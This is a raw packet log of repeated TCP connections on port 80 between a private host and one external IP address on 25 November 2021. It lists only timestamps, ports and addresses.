Nov 25, 2021 10:48:53.902808905 CET	49922	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:53.902863026 CET	49922	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:53.936956882 CET	80	49922	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:54.365125895 CET	49923	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:54.398565054 CET	80	49923	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:54.398863077 CET	49923	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:54.400388002 CET	49923	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:54.433700085 CET	80	49923	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:54.433872938 CET	49923	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:54.467231035 CET	80	49923	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:54.490242004 CET	80	49923	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:54.490298986 CET	80	49923	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:54.490499020 CET	49923	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:54.490617037 CET	49923	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:54.523749113 CET	80	49923	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:54.916212082 CET	49924	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:54.949554920 CET	80	49924	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:54.949774027 CET	49924	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:54.951317072 CET	49924	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:54.984435081 CET	80	49924	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:54.984689951 CET	49924	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:55.017911911 CET	80	49924	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:55.038609028 CET	80	49924	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:55.038682938 CET	80	49924	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:55.038801908 CET	49924	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:55.038857937 CET	49924	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:55.072074890 CET	80	49924	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:55.449352026 CET	49925	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:55.482752085 CET	80	49925	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:55.482976913 CET	49925	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:55.484488964 CET	49925	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:55.517874002 CET	80	49925	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:55.518080950 CET	49925	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:55.551451921 CET	80	49925	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:55.568913937 CET	80	49925	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:55.568964958 CET	80	49925	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:55.569144011 CET	49925	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:55.569195032 CET	49925	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:55.602686882 CET	80	49925	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:55.972367048 CET	49926	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:56.005785942 CET	80	49926	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:56.006212950 CET	49926	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:56.007947922 CET	49926	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:56.041265965 CET	80	49926	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:56.041470051 CET	49926	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:56.074898958 CET	80	49926	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:56.094065905 CET	80	49926	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:56.094114065 CET	80	49926	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:56.094253063 CET	49926	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:56.094300985 CET	49926	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:56.127866030 CET	80	49926	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:56.471900940 CET	49927	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:56.505968094 CET	80	49927	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:56.506220102 CET	49927	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:56.507759094 CET	49927	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:56.541707993 CET	80	49927	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:56.541923046 CET	49927	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:56.576040983 CET	80	49927	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:56.596268892 CET	80	49927	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:56.596333981 CET	80	49927	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:56.596486092 CET	49927	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:56.596553087 CET	49927	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:56.630856991 CET	80	49927	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:57.004852057 CET	49928	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:57.038917065 CET	80	49928	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:57.039277077 CET	49928	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:57.040796995 CET	49928	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:57.074779034 CET	80	49928	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:57.074956894 CET	49928	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:57.109112024 CET	80	49928	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:57.126076937 CET	80	49928	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:57.126132011 CET	80	49928	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:57.126313925 CET	49928	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:57.126396894 CET	49928	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:57.160732031 CET	80	49928	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:57.509054899 CET	49929	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:57.542102098 CET	80	49929	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:57.542284966 CET	49929	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:57.544069052 CET	49929	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:57.577233076 CET	80	49929	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:57.577482939 CET	49929	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:57.610781908 CET	80	49929	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:57.626811028 CET	80	49929	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:57.626867056 CET	80	49929	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:57.627293110 CET	49929	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:57.627352953 CET	49929	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:57.660703897 CET	80	49929	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:58.046160936 CET	49930	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:58.080046892 CET	80	49930	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:58.080249071 CET	49930	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:58.081847906 CET	49930	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:58.115648985 CET	80	49930	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:58.116245031 CET	49930	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:58.150079012 CET	80	49930	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:58.168596029 CET	80	49930	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:58.168658972 CET	80	49930	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:58.168869972 CET	49930	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:58.168922901 CET	49930	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:58.202860117 CET	80	49930	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:58.569021940 CET	49931	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:58.603080034 CET	80	49931	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:58.603313923 CET	49931	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:58.604841948 CET	49931	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:58.638967037 CET	80	49931	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:58.639270067 CET	49931	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:58.673549891 CET	80	49931	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:58.692387104 CET	80	49931	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:58.692451000 CET	80	49931	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:58.692611933 CET	49931	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:58.692672014 CET	49931	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:58.726773977 CET	80	49931	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:59.150527954 CET	49932	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:59.184041023 CET	80	49932	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:59.184319019 CET	49932	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:59.185833931 CET	49932	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:59.219314098 CET	80	49932	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:59.219633102 CET	49932	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:59.253278017 CET	80	49932	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:59.272428989 CET	80	49932	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:59.272494078 CET	80	49932	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:59.272654057 CET	49932	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:59.272722006 CET	49932	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:59.306438923 CET	80	49932	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:59.718640089 CET	49933	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:59.752693892 CET	80	49933	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:59.752938986 CET	49933	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:59.754446983 CET	49933	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:59.788399935 CET	80	49933	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:59.788669109 CET	49933	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:59.822638988 CET	80	49933	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:59.838318110 CET	80	49933	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:59.838376999 CET	80	49933	176.223.209.128	192.168.11.20
Nov 25, 2021 10:48:59.838653088 CET	49933	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:59.838737011 CET	49933	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:48:59.872909069 CET	80	49933	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:00.290584087 CET	49934	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:00.324208975 CET	80	49934	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:00.324433088 CET	49934	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:00.325952053 CET	49934	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:00.359329939 CET	80	49934	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:00.359715939 CET	49934	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:00.393179893 CET	80	49934	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:00.411487103 CET	80	49934	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:00.411535025 CET	80	49934	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:00.411761045 CET	49934	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:00.411803007 CET	49934	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:00.445266008 CET	80	49934	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:00.849597931 CET	49935	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:00.883719921 CET	80	49935	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:00.884015083 CET	49935	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:00.885502100 CET	49935	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:00.919487000 CET	80	49935	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:00.919723988 CET	49935	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:00.953845978 CET	80	49935	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:00.972506046 CET	80	49935	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:00.972534895 CET	80	49935	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:00.972671032 CET	49935	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:00.972717047 CET	49935	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:01.006490946 CET	80	49935	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:01.306140900 CET	49936	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:01.339572906 CET	80	49936	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:01.339910984 CET	49936	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:01.341392994 CET	49936	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:01.374732018 CET	80	49936	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:01.374974012 CET	49936	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:01.408401012 CET	80	49936	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:01.424958944 CET	80	49936	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:01.425010920 CET	80	49936	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:01.425226927 CET	49936	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:01.425287008 CET	49936	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:01.458673000 CET	80	49936	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:01.880484104 CET	49937	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:01.914586067 CET	80	49937	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:01.914796114 CET	49937	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:01.916305065 CET	49937	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:01.950280905 CET	80	49937	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:01.950459003 CET	49937	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:01.984620094 CET	80	49937	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:02.000180006 CET	80	49937	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:02.000236988 CET	80	49937	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:02.000382900 CET	49937	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:02.000438929 CET	49937	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:02.034571886 CET	80	49937	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:02.434910059 CET	49938	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:02.468400002 CET	80	49938	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:02.468611002 CET	49938	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:02.470139980 CET	49938	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:02.503632069 CET	80	49938	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:02.503863096 CET	49938	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:02.537415028 CET	80	49938	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:02.553404093 CET	80	49938	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:02.553469896 CET	80	49938	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:02.553762913 CET	49938	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:02.553862095 CET	49938	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:02.587508917 CET	80	49938	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:02.966933966 CET	49939	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:03.001068115 CET	80	49939	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:03.001220942 CET	49939	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:03.002783060 CET	49939	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:03.036880016 CET	80	49939	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:03.037201881 CET	49939	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:03.071492910 CET	80	49939	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:03.092166901 CET	80	49939	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:03.092222929 CET	80	49939	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:03.092502117 CET	49939	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:03.092585087 CET	49939	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:03.126909018 CET	80	49939	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:03.454917908 CET	49940	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:03.488038063 CET	80	49940	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:03.488271952 CET	49940	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:03.489950895 CET	49940	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:03.523112059 CET	80	49940	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:03.523461103 CET	49940	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:03.556746006 CET	80	49940	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:03.577493906 CET	80	49940	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:03.577565908 CET	80	49940	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:03.577739000 CET	49940	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:03.577799082 CET	49940	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:03.611124039 CET	80	49940	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:03.937809944 CET	49941	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:03.971937895 CET	80	49941	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:03.972163916 CET	49941	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:03.973710060 CET	49941	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:04.007702112 CET	80	49941	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:04.007999897 CET	49941	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:04.042139053 CET	80	49941	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:04.058206081 CET	80	49941	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:04.058260918 CET	80	49941	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:04.058536053 CET	49941	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:04.058619022 CET	49941	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:04.092833042 CET	80	49941	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:04.433562040 CET	49942	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:04.467669010 CET	80	49942	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:04.467819929 CET	49942	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:04.469326019 CET	49942	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:04.503364086 CET	80	49942	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:04.503623009 CET	49942	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:04.537724018 CET	80	49942	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:04.553472996 CET	80	49942	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:04.553544044 CET	80	49942	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:04.553817034 CET	49942	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:04.553899050 CET	49942	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:04.588001966 CET	80	49942	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:04.971168041 CET	49943	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:05.004661083 CET	80	49943	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:05.004882097 CET	49943	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:05.006356955 CET	49943	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:05.039696932 CET	80	49943	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:05.039913893 CET	49943	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:05.073405981 CET	80	49943	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:05.094136000 CET	80	49943	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:05.094199896 CET	80	49943	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:05.094351053 CET	49943	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:05.094414949 CET	49943	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:05.127970934 CET	80	49943	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:05.491472006 CET	49944	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:05.524903059 CET	80	49944	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:05.525127888 CET	49944	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:05.526807070 CET	49944	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:05.560157061 CET	80	49944	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:05.560389996 CET	49944	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:05.593739986 CET	80	49944	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:05.609328032 CET	80	49944	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:05.609383106 CET	80	49944	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:05.609656096 CET	49944	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:05.609739065 CET	49944	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:05.643343925 CET	80	49944	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:05.993745089 CET	49948	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:06.027950048 CET	80	49948	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:06.028233051 CET	49948	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:06.029714108 CET	49948	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:06.063637018 CET	80	49948	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:06.063983917 CET	49948	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:06.097897053 CET	80	49948	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:06.113828897 CET	80	49948	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:06.113838911 CET	80	49948	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:06.114068031 CET	49948	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:06.114074945 CET	49948	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:06.147819042 CET	80	49948	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:06.474020958 CET	49949	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:06.507477999 CET	80	49949	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:06.507642984 CET	49949	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:06.509232044 CET	49949	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:06.542547941 CET	80	49949	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:06.542787075 CET	49949	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:06.576183081 CET	80	49949	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:06.599896908 CET	80	49949	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:06.600163937 CET	49949	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:06.600514889 CET	80	49949	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:06.600682974 CET	49949	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:06.633481979 CET	80	49949	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:06.993573904 CET	49950	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:07.026964903 CET	80	49950	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:07.027174950 CET	49950	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:07.028729916 CET	49950	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:07.062154055 CET	80	49950	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:07.062469006 CET	49950	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:07.096118927 CET	80	49950	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:07.112368107 CET	80	49950	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:07.112432003 CET	80	49950	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:07.112617016 CET	49950	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:07.112709999 CET	49950	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:07.146374941 CET	80	49950	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:07.514194012 CET	49951	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:07.548338890 CET	80	49951	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:07.548475981 CET	49951	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:07.550026894 CET	49951	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:07.584136009 CET	80	49951	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:07.584471941 CET	49951	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:07.618635893 CET	80	49951	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:07.634911060 CET	80	49951	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:07.634963036 CET	80	49951	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:07.635145903 CET	49951	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:07.635200024 CET	49951	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:07.669365883 CET	80	49951	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:08.011497021 CET	49952	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:08.044923067 CET	80	49952	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:08.045149088 CET	49952	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:08.046701908 CET	49952	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:08.079946041 CET	80	49952	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:08.080122948 CET	49952	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:08.113564968 CET	80	49952	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:08.133228064 CET	80	49952	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:08.133291960 CET	80	49952	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:08.133579016 CET	49952	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:08.133677006 CET	49952	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:08.167256117 CET	80	49952	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:08.466594934 CET	49953	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:08.500710964 CET	80	49953	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:08.500977039 CET	49953	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:08.502494097 CET	49953	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:08.536473989 CET	80	49953	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:08.536693096 CET	49953	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:08.571477890 CET	80	49953	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:08.595326900 CET	80	49953	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:08.595382929 CET	80	49953	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:08.595560074 CET	49953	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:08.595643044 CET	49953	80	192.168.11.20	176.223.209.128
Nov 25, 2021 10:49:08.629909039 CET	80	49953	176.223.209.128	192.168.11.20
Nov 25, 2021 10:49:09.017771006 CET	49954	80	192.168.11.20	176.223.209.128
